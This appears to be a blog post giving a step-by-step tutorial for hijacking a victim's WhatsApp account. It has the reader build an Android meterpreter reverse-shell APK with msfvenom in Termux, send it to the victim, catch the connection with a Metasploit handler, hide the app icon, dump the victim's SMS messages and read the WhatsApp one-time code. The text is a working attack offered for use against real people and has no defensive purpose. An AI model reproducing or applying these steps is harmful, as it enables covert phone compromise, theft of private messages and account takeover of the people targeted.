Hack whatsapp with metasploit exploitation involves sending and binding payloads into apk format to get victims whatsapp otp code .
STEP1: Open termux and start the metasploit session. If metasploit isnt installed, Type the below commands to install it. Type the commands without the quotes.
"pkg update && pkg upgrade"
"pkg install root-repo"
"pkg install unstable-repo'
"pkg install metasploit"
Lastly, Type msfconsole to enter the metasploit session.
If metasploit is already installed in termux, just type msfconsole.
STEP2: Turn ur device mobile hotspot on, dont turn it off, after that open another session in termux by swiping from left to right on your screen then click new session. Once the session has been created Type the below commands without the quotes.
"ifconfig"
This command will view your ip address as well as other network configurations in termux, after the commands scroll up, youll see something like inet: 198.168.....
Eg u may see inet: 198.168.104.3
The ip above is just an example and may not be ur real IP, after you've seen it, copy the IP address eg copy the 198.168.104.3
STEP3: IN the same session that u are in, type the below commands without the quotes.
"msfvenom -p android/meterpreter/reverse_tcp LHOST=(Paste the ip you copied) LPORT=4444 R>/sdcard/Termux.apk"
Where;
LHOST = THE IP YOU COPIED IN THE IFCONFIG
LPORT = 4444 OR IF YOU DONT WANT TO USE 4444, you can use another one by mapping ur ip using nmap eg type nmap -v (ip) eg nmap -v 198.168.104.3, then you will see avaiable open ports for ur ip, you can use anyone u want.
>/sdcard/ = This will move the payload apk to ur internal storage.
Termux.apk = The name of the payload, you can give your payload the name you want by changing the termux to the name of your choice.
STEP4: After your payload has been created, you need to sign it, to do so, download MiX explorer, locate the apk, long press it, Then click the three dots on the top left corner.
After that youll see sign..tap it and click on the tab that appears then click auto. After the apk has been signed.(you can continue further editing by using apk editor (old version)
STEP5: Now u need to send the payload apk to your victim either via gmail, xender, telegram,whatsapp, etc.
Once the victim installs and open the app, nothing will appear, But we hackers have to star the exploitation💥💥💥.
STEP6: In your termux, swipe from left to right then tap on the msfconsole session it will look like this
⬇⬇⬇
msf>
Now what you need to type is
"use exploit/multi/handler"
Make sure you type without the quotes hit enter on your keyboard now after typing that type the below commands next without thr quotes.
"set payload/android/meterpreter/reverse_tcp"
Then hit enter on your keyboard. Next type the below commands without the quotes.
"set LHOST (YOUR IP YOU COPIED IN STEP2)"
EG: Type set LHOST 198.168.103.4
After typing that, hit enter on your keyboard. Then type the next command below without the quotes.
"set LPORT 4444"
YOU CAN USE THE PORT YOU GOT WHEN YOU TYPED nmap -v (your ip) in STEP3.
Once you have typed that, the next thing for you to do is to type the last command without the quotes.
"exploit"
Wait for a while for the binding to finish (your victim must open it for the binding to be faster, even though your victim doesnt see anything) Once the binding finishes, you will see something like this.
⏬⏬
meterpreter>
STEP7: During the meterpreter session, Type hide_app_icon
;This command will hide the payload from your victims device. Now lets continue with the hack.
In that same session, Type dump_sms
This command will fetch all messages on the victims device, We typed that command because we know whatsapp sent an otp tp the victim via message
After we have typed that..It will look like this.
⏬⏬
[*]Fetching messages...
[*]sms saved to: sms_dump_234567890123.txt
You may see a different number there it could be 3452019283719.txt, etc.
STEP8: Open another new session in termux and type ls
; This command is to list all directories in Termux home.
Once it has been typed, You will see the dump_sms_234567890123.txt file there.
Now what u need to do is to copy the text file you see there Then type the command below without the quotes.
"cat {text you copied}"
eg cat sms_dump_234567890123.txt
After typing that, you will see all the messages of the victim, Now keep scrolling down till u see a message sent by Whatsapp and in this message the otp code of the victim would be shown there.
STEP9: Copy the otp code you saw and then you can use it to hack your victim whatsapp.
Enjoy! Follow us for more...
No comments:
Post a Comment